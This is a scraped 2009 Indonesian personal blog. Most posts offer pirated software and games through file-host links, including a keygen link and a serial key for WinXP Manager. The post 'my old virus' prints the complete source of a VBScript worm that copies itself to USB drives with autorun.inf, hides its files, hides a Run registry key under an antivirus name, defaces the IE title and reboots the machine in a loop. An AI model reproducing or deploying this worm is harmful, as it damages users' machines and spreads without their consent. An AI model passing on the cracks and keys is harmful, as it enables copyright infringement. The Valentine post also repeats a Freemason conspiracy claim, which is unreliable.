* Detect service predefined custom action
* Per-build GUI themes
* Ability to condition standard actions
* Detailed information when trying to remove a referenced file, folder or property
* Wizard for "Browse IIS Websites & Virtual Directories" predefined custom action
* Wizard for "Browse for SQL Servers" predefined custom action
* Installed Office 2003 application predefined launch condition
* Over 38 enhancements and bug fixes

Homepage
Code:
http://www.advancedinstaller.com
Size: 14.8 MB

Download

http://www.advancedinstaller.com/downloads/advinst.msi
Licence

http://rapidshare.com/files/201787563/Advanced.Installer.Licence.rar
Read more...

windows manager

The complete solution to optimize, tweak, clean up Windows XP
WinXP Manager is a tool for setting, optimizing, diagnosing and tweaking Windows XP. It bundles more than 30 different utilities in one and help your system faster and more stable, secure and personal! WinXP Manager helps you optimize, tweak, and clean up Windows XP. It will increase your system speed, improve system security, and meet all of your expectations.

You can tweak memory and CPU settings, customize IE settings, find and remove junk files, check and repair your registry, control startup programs, optimize your connection speed, validate your Favorites and much more. It also includes an Auto-Optimization option, that allows less experienced users to easily optimize certain settings, using a wizard. The interface is easy to use and all available options are categorized into sections. Includes basic documentation and an annoying nag screen that pops up every few minutes. It's compatible with Windows XP SP3 entirely!

Features and Benefits of WinXP Manager:
• Information - Get detailed system and all hardware information on your system; helps you to find out the missing Registration codes of Microsoft product; show all detailed information of running processes and threads on your machine; WinXP Manager offers optimization Wizard feature for the user without having any advanced knowledge.
• Optimizer - Tweak your system to improve windows startup and shutdown speed; monitor and free your Physical Memory; tweak your hardware to increase system speed and performance; disable some unnecessary services which start with windows; repairs Internet Explorer and certain other System Components to restore these functions.
• Cleaner - Find out which files or folders engross your disk space and shown with chart; Find and clean junk, unnecessary wallpaper and screen saver files to increase Hard Disk space; Duplicate Files Finder can scan your computer for files with the same size, name and modification time; Registry Cleaner can easily checks your registry and repair incorrectly linked registry entries, automatically remove invalid entries; Registry Defrag rebuilds and re-indexs your registry to reduce application response time and registry access time; smart uninstaller can uninstall and logoff installed programs neatly.
• Customization - Control what is started on Windows startup; edit context menus of mouse Right-Clicking; customize system desktop, menus, toolbar and notifications settings, change Windows logon background; change system icons; custom OEM information; automatically change your desktop wallpaper on background.
• Security - You can improve desktop, menus, control panel, windows logon securities, and enable numerous hidden performance options of system, disable system updates and error reports; hide and restrict to access drives, specify which applications are not allowed to be executed on your computer; encrypt/decrypt and shred files, camouflage folder to hide its content from Windows explorer, change the location of system folders; Privacy Protector can maintain your personal privacy by eliminating the tracks that you leave behind; create lots of randomization password once.
• Network - Optimize your Internet connection speed, manage all shares items, search for and find out opened ports on your system; Tweak your Internet Explorer easily; backup all data in Outlook Express; automatically check the invalid URLs in your favorites and parse domain name; Message Sender can easily send messages to others.
• Misc. Utilities - Show the collection of Windows utilities; control your computer when you're not at home; apply XP visual style to any Windows applications; appoint logging on time of any account users.

Homepage

http://www.winxp-manager.com
Size: 5.35 MB

Download

http://www.yamicsoft.com/xpmanager/software/xpmanager.exe
Key.gen

http://rapidshare.com/files/199969025/WinXP.Manager.Key.gen.rar
OR:

http://www.yamicsoft.com/xpmanager/software/xpmanager.exe
Name: Wocarson
Key: LLTHL-JMRP6-UDKOP-EYSGK
Read more...

windows manager

The complete solution to optimize, tweak, clean up Windows XP
WinXP Manager is a tool for setting, optimizing, diagnosing and tweaking Windows XP. It bundles more than 30 different utilities in one and help your system faster and more stable, secure and personal! WinXP Manager helps you optimize, tweak, and clean up Windows XP. It will increase your system speed, improve system security, and meet all of your expectations.

You can tweak memory and CPU settings, customize IE settings, find and remove junk files, check and repair your registry, control startup programs, optimize your connection speed, validate your Favorites and much more. It also includes an Auto-Optimization option, that allows less experienced users to easily optimize certain settings, using a wizard. The interface is easy to use and all available options are categorized into sections. Includes basic documentation and an annoying nag screen that pops up every few minutes. It's compatible with Windows XP SP3 entirely!

Features and Benefits of WinXP Manager:
• Information - Get detailed system and all hardware information on your system; helps you to find out the missing Registration codes of Microsoft product; show all detailed information of running processes and threads on your machine; WinXP Manager offers optimization Wizard feature for the user without having any advanced knowledge.
• Optimizer - Tweak your system to improve windows startup and shutdown speed; monitor and free your Physical Memory; tweak your hardware to increase system speed and performance; disable some unnecessary services which start with windows; repairs Internet Explorer and certain other System Components to restore these functions.
• Cleaner - Find out which files or folders engross your disk space and shown with chart; Find and clean junk, unnecessary wallpaper and screen saver files to increase Hard Disk space; Duplicate Files Finder can scan your computer for files with the same size, name and modification time; Registry Cleaner can easily checks your registry and repair incorrectly linked registry entries, automatically remove invalid entries; Registry Defrag rebuilds and re-indexs your registry to reduce application response time and registry access time; smart uninstaller can uninstall and logoff installed programs neatly.
• Customization - Control what is started on Windows startup; edit context menus of mouse Right-Clicking; customize system desktop, menus, toolbar and notifications settings, change Windows logon background; change system icons; custom OEM information; automatically change your desktop wallpaper on background.
• Security - You can improve desktop, menus, control panel, windows logon securities, and enable numerous hidden performance options of system, disable system updates and error reports; hide and restrict to access drives, specify which applications are not allowed to be executed on your computer; encrypt/decrypt and shred files, camouflage folder to hide its content from Windows explorer, change the location of system folders; Privacy Protector can maintain your personal privacy by eliminating the tracks that you leave behind; create lots of randomization password once.
• Network - Optimize your Internet connection speed, manage all shares items, search for and find out opened ports on your system; Tweak your Internet Explorer easily; backup all data in Outlook Express; automatically check the invalid URLs in your favorites and parse domain name; Message Sender can easily send messages to others.
• Misc. Utilities - Show the collection of Windows utilities; control your computer when you're not at home; apply XP visual style to any Windows applications; appoint logging on time of any account users.

Homepage

http://www.winxp-manager.com
Size: 5.35 MB

Download

http://www.yamicsoft.com/xpmanager/software/xpmanager.exe
Key.gen

http://rapidshare.com/files/199969025/WinXP.Manager.Key.gen.rar
OR:

http://www.yamicsoft.com/xpmanager/software/xpmanager.exe
Name: Wocarson
Key: LLTHL-JMRP6-UDKOP-EYSGK
Read more...

Sunday, February 22, 2009

my old virus

dim natan
masuk()
sub masuk()
set natan = wscript.CreateObject("wscript.shell")
msgbox "selamat datang di spyfizz",vbInformation,"selamat datang"
msgbox "mo bka bokep y??",vbInformation,"kcian"
msgbox"jangan panik donk!!!", 0+0+48, "panik nieh!!!"
end sub

on error resume next
Rem 121206, i very hate u
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = "[autorun]"&vbcrlf&”shellexecute=wscript.exe spyfizz.vbs":Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & "\spyfizz.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\spyfizz.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\spyfizz.vbs"): tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then:
Set tf = fs.getfile(flashdrive.Path & "\spyfizz.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\spyfizz.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\spyfizz.vbs"): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39:
if fs.fileexists(Wscript.ScriptFullname) = false then
Set tf = fs.createtextfile(wscript.scriptfullname): tf.write src
End If
Next
Set rg = CreateObject("WScript.Shell"): rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\avast!!",winpath & "\spyfizz.vbs": rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "spyfizz says_fuck USA, israel, & Rusia": rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2?
natan.run "shutdown -r -t 5 -c good_bye_computer!!"
loop
Read more...

Saturday, February 14, 2009

yin&yang berhubungan dengan agama islam


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com







kalian tau yin&yang..

itu adlh teori kehidupan dasar yang da di cina..
pdhl itu bkan hanya teori yang mencakup kehidupan yang da di cina j, tpi teori itu mencakup seluruh manusia..
dan bahkan ntuh teori ada di islam, wlau cara menjelaskannya berbeda...
yang membuat berbeda dgn islam itu cma gra2 mrka membesar2kan dengan khayalan mereka j
blang waktu bsa di mundurin lah...
blang bisa idup lagi lah...
inti dari yin&yang ntuh segala sesuatu yang ada di dunia & di akhirat saling berlawanan tetapi saling berkaitan
dan w akui itu emg bner...
karna mirip teori 5 perkara islam
contohnya:
ada sehat, ada sakit
ada kaya, ada miskin
ada dunia, ada akhirat
ada surga, ada neraka
ada pahala, ada dosa
n de el el,
qlo w sebutin nda bkal da habisnya karna semuanya itu kyk gtu..
bahkan malaikat dan setan itu bsa di sebut yin&yang, dan manusia itu berada ditengah2 keduanya
kalian itu akan mendapatkan pahala&dosa karna adanya 2 makhluk tsb
sekarang tinggal dr kaliannya j yang memutuskan ingin lbh ngikut sifatnya malaikat atau ngikut sifatnya setan.
manusia diturunkan ke bumi itu untuk memilih ingin masuk k golongan malaikat yang taat pada ALLAH atau masuk k golongan setan yang pemberontak pada ALLAH
dan semua itu akan diberi reward oleh ALLAH berupa surga dan neraka
jika ada yang mengatakan "hidup adalah pilihan"..
ntuh mua bner..





Read more...

warcraft wrath of the lich king


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com







setau saya , nih game yang paling diminatin deh oleh gamer2...
soalnya, setiap saya ke warnet pasti pada maen gnian dah...
maennya sih bsa saya tpi gk jago kyk gamer war craft...
bisnya saya mah nda bakat jdi raja pertarungan dah.....
hehehhehhe

nih langsung aja di donload












http://rapidshare.com/files/117798179/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part01.rar
http://rapidshare.com/files/117798228/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part02.rar
http://rapidshare.com/files/117798187/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part03.rar
http://rapidshare.com/files/117798230/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part04.rar
http://rapidshare.com/files/117798235/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part05.rar
http://rapidshare.com/files/117798221/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part06.rar
http://rapidshare.com/files/117798162/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part07.rar
http://rapidshare.com/files/117798299/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part08.rar
http://rapidshare.com/files/117798186/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part09.rar
http://rapidshare.com/files/117798225/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part10.rar
http://rapidshare.com/files/117798889/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part11.rar
http://rapidshare.com/files/117798928/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part12.rar
http://rapidshare.com/files/117798932/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part13.rar
http://rapidshare.com/files/117798906/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part14.rar
http://rapidshare.com/files/117798925/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part15.rar
http://rapidshare.com/files/117798891/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part16.rar
http://rapidshare.com/files/117798915/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part17.rar
http://rapidshare.com/files/117799071/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part18.rar
http://rapidshare.com/files/117798902/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part19.rar
http://rapidshare.com/files/117798875/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part20.rar
http://rapidshare.com/files/117799423/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part21.rar
http://rapidshare.com/files/117799467/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part22.rar
http://rapidshare.com/files/117799405/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part23.rar
http://rapidshare.com/files/117799409/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part24.rar
http://rapidshare.com/files/117799602/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part25.rar
http://rapidshare.com/files/117799328/World.of.Warcraft.Wrath.of.the.Lich.King-EMUPEDiA-TAHIR2767.part26.rar




Read more...

yu-gi-oh power of chaos full 3 edtion


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com



nih game yang paling saya ska...
karna gambar2 monsternya kreatif bgt...
gmn y jpang bsa ngebuat gambar2 keren kyk gtu...

tpi qlo yang laen mah lom tau dah ska atau nda ma game ini...

y dah donload j & let's try ok....

nih versi kaiba the revenge, yugi the destiny, & joey the passion





Download:
http://rapidshare.com/files/30480066/YGO.POC.Yugi.part01.rar
http://rapidshare.com/files/30663350/YGO.POC.Yugi.part02.rar
http://rapidshare.com/files/30689257/YGO.POC.Yugi.part03.rar
http://rapidshare.com/files/30694155/YGO.POC.Yugi.part04.rar
http://rapidshare.com/files/30697999/YGO.POC.Yugi.part05.rar
http://rapidshare.com/files/30701871/YGO.POC.Yugi.part06.rar
http://rapidshare.com/files/30705947/YGO.POC.Yugi.part07.rar
http://rapidshare.com/files/30710452/YGO.POC.Yugi.part08.rar


qlo ini buat cheat pya semua kartunya kebuka...


All 771 Cards
http://rapidshare.com/files/118180986/joey.all.cards.rar







Read more...

windows versi usb 2009...


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com





mungkin bgi yang suka mengoleksi software sudah tau&punya tentang windows versi usbnya...
tpi disini tetep saya share, cz mungkin msh bnyk jg orng yang blm puny software ini...

eh jngn lpa y sblm donlod sempetin klik iklan saya y...
lgi blajar cri duit ndiri nih...
drpd minta mlu ma bonyok...

ehehehehhehehe

http://www.mediafire.com/?2aavwutugvt
http://www.mediafire.com/?nmwgevcbwbm










Read more...

windows XP SP3 corporate


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com




ini link download isinya bkan windows asli karna udah di modif ama orng...
tpi cma di ksh aplikasi pendukung performance j ko....
di jamin nda da virus, atau trojan..
saya posting yang ini aja karna saya lupa URL download yang aslinya...
abisnya dah ampir setaon tuh di donlod nya...
sorry y, yang pengen asli cri j lgi...

nih qlo da yang mao nyoba windows SP3 corporate modifan

saya kasih gratis...





mao lewat rapidshare

nih

http://rapidshare.com/files/192880734/WCF2009_UDS.part1.rar
http://rapidshare.com/files/192879418/WCF2009_UDS.part2.rar
http://rapidshare.com/files/192879371/WCF2009_UDS.part3.rar
http://rapidshare.com/files/192880692/WCF2009_UDS.part4.rar
http://rapidshare.com/files/192883538/WCF2009_UDS.part5.rar
http://rapidshare.com/files/192883571/WCF2009_UDS.part6.rar
http://rapidshare.com/files/192879009/WCF2009_UDS.part7.rar
http://rapidshare.com/files/192878495/verify.sfv




ato lewat adrive


http://www.adrive.com/public/d7985e4aa4559f98a7144b07b8971accd0ebb82a4a8a1c286d4852d1e2df4759.html
http://www.adrive.com/public/42ec264f0f1f70d29faf038d34a1e66a8e6730b561c93b10a92773d80531e42f.html
http://www.adrive.com/public/6b0f9ca25009253659cacd6b5e70a85bf8f1f6809ce7e46ad49c2b0859d3f495.html
http://www.adrive.com/public/c5812a83f01255fbaf56e3430ec03a8c4cd2cc1c306354997e7b59b653e7e41a.html
http://www.adrive.com/public/4c575a60d6ac97c1b71e5f85dcd915d4a9e33eb225c5b237a6d0282770af9389.html
http://www.adrive.com/public/d282f0fd7f1e56874d0b82b45248702638e6f8139ec0e3bf54d59a648af394e6.html
http://www.adrive.com/public/82fd0047db259e717b0a03d5df1a435e4235c9b88c6525e387e4efe043ee8643.html
sfv
http://www.adrive.com/public/77a977e04f3d9f805ff40e324fe43e242e579ad0110035af150e8a07991a2ae4.html


media fire jg ada...

http://www.mediafire.com/?enim1qm4kkz
http://www.mediafire.com/?dj0nckqzjgl
http://www.mediafire.com/?hnnj5nz01zt
http://www.mediafire.com/?cxzm0m4m8mr
http://www.mediafire.com/?sybejzmsio3
http://www.mediafire.com/?qdtmsdyb2n5
http://www.mediafire.com/?o9gddbymzlz
http://www.mediafire.com/?tcmmk2j3zlc (sfv)


pilih j sono....

sama semua ko...

oy, jngn lpa klik iklan dibwah nih y...

amal lah dkit....

hehheheheeh






Read more...

download windows 7 gratis....


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com



sebelum kalian download nih OS baru thn 2009 , tolong bantu saya untuk mengklik iklan saya di bawah....

qlo sudah da yang baik hati mau mengklik iklan saya, saya ucapkan ma kasih bnyk.....


Microsoft telah mengumumkan bahwa download Windows 7 Beta secara resmi akan tersedia mulai hari Jumat, 9 Januari 2009 Pasific Time. Jika waktu yang dimaksudkan adalah pukul 00.00, maka untuk Waktu Indonesia Barat akan jatuh pada hari Jumat, 9 Januari 2009 pukul 15.00 WIB. Windows 7 Beta ini rencananya akan dapat didownload melalui halaman Windows 7 di Windows.com dan akan tersedia untuk edisi English, German, Japanese, Arabic, dan Hindi. Masing-masing akan tersedia versi 32-bit dan 64-bit kecuali untuk Hindi yang akan tersedia versi 32-bit saja. Fasilitas download Windows 7 Beta ini sendiri akan berlaku terbatas untuk 2,5 juta pendownload pertama.


tpi qlo di blog saya mah beda, smua yg sgla byar2 pke duit di usahain bkal gratis tis tis untuk semuanya...


download










Read more...

komentarku tentang valentine

Jika melihat sejarah munculnya hari Valentine, maka ditemui beberapa versi yang erat kaitannya dengan nama seorang pendeta dan Romawi. Dalam satu versi disebutkan pendeta Valentine dihukum mati karena menantang kebijakan Raja Romawi Claudius II. Di versi lain ia pun dihukum mati karena mengawinkan para pemuda secara diam-diam, disaat kerajaan Romawi membutuhkan bujangan untuk dikirim kemedan perang karena dianggap mereka lebih tabah menghadapi sulitnya medan perang dibanding pria yang telah menikah. Di versi lain diceritakan, nama Valentine adalah usaha para pendeta Nasrani untuk mengikis pengaruh Romawi pada suatu wilayah pinggiran Eropa, dengan mengganti nama Tuhan ibu menjadi Valentine




liat nih dri info yang w dpet.......

mna yang bner sejarah valentine.....??

gajebo kan????

mkana qlo jdi orng jngn latahan donk....

qlo pengen ngerayain atau melakukan sesuatu itu dipikir2 & dicari tahu dlu asal usulna....

maen ikut2an aj....

mank dsar orng indo mah tuturut munding wae...

qlo kta w mah gk perlu da hari2 gtuan buat pa??

tiap hari qta itu bsa melihat, merasakan & memberikan cinta ke onrg yg qta cinta...

qlo cma 1 hari nda bkal da ngaruhna...

pling2 pas valentine ngasih coklat ma bunga doank...

emg ksh syang itu gtu doank...??

nyadar donk yang merasa islam...

itu kan tradisi kristen...

ngapa kalian ikutin...

kalian tuh dah dibohongin ma organnisasi penghancur islam(freemason)

nda percya?

bca brta di internet mkana....

jngn maen chatting tau FS yang gk jelas tuh...

agama islam kalian mao dikemanain....

cma nyantol doank di KTP y???

kalian tau betapa sedihnya ALLAH SWT ktka orng2 menjadi murtad...

ALLAH berfirman : lebih baik AKU kehilangan alam semesta beserta isinya ini daripada AKU kehilangan 1 hambaKU

kalian gk sadar apa, qlo setiap hari,jam,menit, bahkan detik itu ada yang selalu menyayangi kalian, yaitu ALLAH SWT
Read more...

Friday, February 13, 2009

cara pasang iklan di blog (kumpulblogger)


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com










Anda sudah merasa lama didunia perbloggeran?, Anda merasa tidak mendapatkan apa-apa dari blog selain kepuasan hati?. Jangan salah blogger juga bisa dijadikan sumber penghasilan lho, Antara lain dengan cara memasang iklan di blog Anda dengan jasa periklanan Indonesia kumpulblogger.com, Anda tidak perlu bersusah-susah mencari iklan sendiri tinggal daftar terus pasang scriptnya di blog Anda karena kumpulblogger.com sudah mencarikan iklan untuk Anda jadi Anda tinggal terima beresnya saja.
Apalagi kalau blog Anda pengunjungnya sudah banyak pasti uang akan mengalir dengan sendirinya. Kumpulblogger.com menghitung setiap text link atau banner yang disediakan dengan cara PPC (pay per clik) atau setiap ada pengunjung yang mengklik zona iklan Anda.

Gimana enak gak? mau? ikuti caranya dibawah ini

Langkah pertama yang harus Anda lakukan adalah mendaftar kumpulblogger.com disini dengan cara mengklik link "register now" pada pojok kanan atas di situs kumpulblogger.com

Lalu masukkan alamat email Anda lalu klik tombol "Register" otomatis password untuk Log In sudah ada di email Anda. Anda bisa mengubah passwordnya setelah Anda Log In

Lalu setelah Anda Log In sebelum pasang scriptnya klik link "Tambah Blog" Pada menu Blogger

Isi form sesuai perintahnya lalu klik tombol "Submit"

Kalau sudah klik link "Script Text Advertising untuk Blog anda" dan pilih style iklan yang Anda sukai lalu copy scriptnya dan tempatkan di blog Anda dengan cara masuk menu Layout (tata letak) pada dashboard blogger lalu pada menu Page element (elemen halaman) pilih tempat yang Anda sukai dan klik "add a gadget" lalu pilih "HTML/JavaScript" dan Paste Script tadi yang Anda copy di kumpulblogger.com

Nah selesai

Selamat datang didunia Blogger dan selamat datang didunia periklanan.






Read more...

Trik: Cara Melihat / Mendeteksi YM Status Invisible Teman


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com






Status invisible digunakan untuk mengeset status kita menjadi seperti offline. Sehingga teman kita melihat status Yahoo messenger kita menjadi offline, padahal sebenarnya kita online. Biasanya, ini digunakan untuk orang yg tidak ingin diganggu. Misalnya sedang YMan dengan orang tertentu. Lalu, jika anda ingin melihat status YM teman anda yg sebenarnya online atau tidak, gunakan trik berikut ini:

1. Mengecek dengan menggunakan situs yang menyediakan layanan tersebut.
Berikut list situs yang menyediakan layanan tersebut :
http://www.invisible-scanner.com/
http://www.ydetector.com/
http://www.4invisible.com/
http://www.invisible.ir/
http://www.detectinvisible.com/
http://www.statusdetect.com/
http://www.invisibleyahoo.com/
http://www.yahoo-status.com/
http://www.2oost.com/
http://www.buzzu.info/
http://www.vizgin.com/
http://www.yahootracer.com/
http://www.yahoo-on.net/

2. Menggunakan fasiltas IMvironment.
- Login terlebih dahulu dengan di YM anda.
- Klik 2 kali ID teman anda yang mau dilihat
- Klik IMvironment –> Yahoo Tools –> Doodle..
- Setelah muncul “Waiting for Your Buddy to load Doodle”, tunggu beberapa detik.
- Jika Doodle tersebut berubah “Blank”, berarti dia Invisible.
- Jika keadaan Doodle tetap sama berarti dia Offline.





Read more...

sj boy emulator (java)


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com





aplikasi ini mungkin sudah terkenal di kalangan chatter, khususnya chatter mig33..
karena selain aplikasi ini digunakan untuk chatting, bisa juga di gunakan untuk membuat multi id mig33...

kalau da yang pengen donwload w ksh nih gratis....

tpi nanti y, cz lgi di upload dlu....

qlo udah nanti w kasih deh





Read more...

symbian emulator


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com










aplikasi ini bisa untuk menjalankan aplikasi yang berbasis symbian yang ada di hp..

so, kita bsa maenin game, atau aplikasi hp yang berbasis symbian di hp

let's try..

download disini





Read more...

Download PCMAV 2.0 Valkyrie Beta


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com








Sepertinya rilis PC Media Antivirus (PCMAV) 2.0 semakin dekat. Setelah membagikan PCMAV 2.0 Valkyrie Alpha 2 untuk diuji coba, kemarin PC Media mengirimkan PCMAV 2.0 Valkyrie Beta. Berbeda ketika mengirimkan PCMAV 2.0 Valkyrie Alpha 2 yang disertai pesan untuk tidak mendistribusikannya, untuk rilis PCMAV 2.0 Valkyrie Beta diperbolehkan untuk diserbarluaskan secara utuh dan lengkap ke pihak lain yang membutuhkan, namun perlu diingatkan kembali ke pihak lain tersebut bahwa rilis Beta ini hanya untuk kepentingan uji coba semata, bukan untuk penggunaan operasional sehari-hari. Melalui tulisan ini, saya akan berbagi link download PCMAV 2.0 Valkyrie Beta bagi Anda yang ingin turut mencobanya.

Download PCMAV 2.0 Beta (2,84 MB) dari salah satu server berikut :

Ziddu | Uploaded.to | Rapidshare | IndoWebster

Secara garis besar, apa-apa yang dapat dilihat pada PCMAV 2.0 Beta ini telah saya tulis dan tampilkan screenshot-nya ketika membahas PCMAV 2.0 Valkyrie Alpha 2, dan kesempatan ini selain membagikan link download PCMAV di atas, saya hanya akan menuliskan kembali informasi update yang dilakukan sampai dengan PCMAV 2.0 beta sebagaimana yang ada pada file readme.txt. Jika ada hal lain mengenai PCMAV 2.0 Beta ini akan saya tuliskan tersendiri.

Pada PCMAV 2.0 Beta ini, seluruh fitur yang direncanakan hadir di PCMAV 2.0
telah dianggap lengkap. Fitur-fitur tersebut adalah Automatic Update, Virus Quarantine, Virus Submit, RTP for Windows Vista & 7, iScan for ClamAV engine, integrated Cleaner & RTP module, dan Tampilan baru nan segar dan menyenangkan.

* iScan for ClamAV
Berupa tambahan engine IntelligenceScan untuk meningkatkan akselerasi pendeteksian pada engine ClamAV. Dengan iScan, kini performa scan ClamAV dapat lebih cepat hingga 35%.
* RTP for Vista & Windows 7
RTP kini telah dapat berjalan lancar dan stabil di Windows Vista. Khusus untuk di Windows 7, walau cukup berjalan lancar, RTP masih bersifat eksperimental mengingat Windows 7 sendiri masih berstatus Beta.
* Integrasi modul Cleaner & RTP
Kini Cleaner tidak lagi memeriksa memory/start-up Windows ketika RTP telah aktif. Penggunaan memory bersama untuk database virus.
* Database virus utama (pcmav.vdb) kini dikeluarkan dari modul utama. Dan bersama file update database virus (update.vdb) diletakkan di folder \vdb\
* Optimalisasi penggunaan memory dan pencarian file yang lebih cepat dan stabil.
* Penyempurnaan tampilan baru yang lebih segar dan menyenangkan.
* Perbaikan beberapa bug yang ditemukan di Alpha1 dan Alpha2, terutama di fitur
Update Manager, Virus Quarantine dan Virus Submit.

Sekiranya Anda berminat untuk mencobanya, silahkan mendownload melalui link di tas dan setelahnya mungkin dapat berbagi kesan, permasalahan, dan usulan melalui form komentar di bawah. Dan sekedar mengingatkan kembali pesan PC media, rilis Beta ini hanya untuk kepentingan uji coba semata, bukan untuk penggunaan operasional sehari-hari.





Read more...

Antivirus dan Antispyware untuk Windows 7

from: maseko.com







Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com










Jika Anda sudah pernah menginstall Windows 7 Beta, tentu melihat pesan yang dinyatakan penting dari Action Center yang berada pada system tray yang salah satunya adalah permintaan untuk mencari dan program antivirus. Dari sini dapat ditangkap bahwa Microsoft sendiri menganggap bahwa sistem yang dibuatnya belumlah aman jika tanpa disertai program lain untuk menangkal virus dan malware. Seperti pada Windows Vista, program keamanan yang disertakan pada Windows 7 Beta hanya antispyware yaitu Windows Defender.

Jika melihat daftar Microsoft mengenai program antivirus yang compatible dengan Windows 7 Beta, sudah ada tiga program antivirus yang masuk yaitu:

* Symantec yang memberikan Norton 360 3.0 Beta
* AVG yang menawarkan AVG Internet Security dan AVG Anti-Virus dimana keduanya adalah produk komersial AVG
* Kaspersky yang menyediakan technical preview dari Kaspersky Anti-Virus for Windows 7.

Apakah memang terbatas hanya itu? Kemudian saya pun mencoba menginstall dan menjalankan AVG 8 Free Edition dan Avira Antivir Personal yang gratis digunakan, dan ternyata dari proses instalasi maupun pada saat berjalan, belum ada masalah yang timbul. Pada Action Center Windows 7 sendiri membaca secara baik keberadaan kedua antivirus tersebut termasuk statusnya jika real-time protection mati atau pada saat memerlukan update.

Di How-to Geek sudah ada tulisan berdasarkan percobaan langsung yang menghasilkan daftar Antivirus dan daftar Antispyware yang kompatibel dengan Windows 7.

Antivirus yang kompatibel dengan Windows 7

* AVG Anti-Virus Free Edition - this is what I personally use… it’s excellent and FREE
* Avira AntiVir Personal Edition
* Norton AntiVirus 2009
* Avast! AntiVirus Home
* Kapersky Anti-Virus 2009
* PCGuard Anti-Virus from Virgina Media Broadband
* ESET Nod32 Anti-Virus
* Microsoft Forefront Client Security (Enterprise)

Antivirus yang TIDAK kompatibel dengan Windows 7

* McAfee VirusScan
* Microsoft Windows Live OneCare

AntiSpyware yang kompatibel dengan Windows 7

* Windows Defender
* Spybot Search & Destroy
* Ad-Aware
* Malwarebytes’ Anti-Malware
* Spyware Blaster

Sebagai catatan, jika Anda misalnya ingin menggunakan program Anti-spyware selain Windows Defender yang sudah ada dalam Windows 7 Beta, maka sebaiknya Windows Defender diuninstall dulu karena menggunakan dua atau lebih produk antivirus atau antispyware akan terlalu membebani sistem.







Read more...

Thursday, February 12, 2009

cascading style sheet


Masukkan Code ini K1-E2A8B8-E
untuk berbelanja di KutuKutuBuku.com








Introduksi




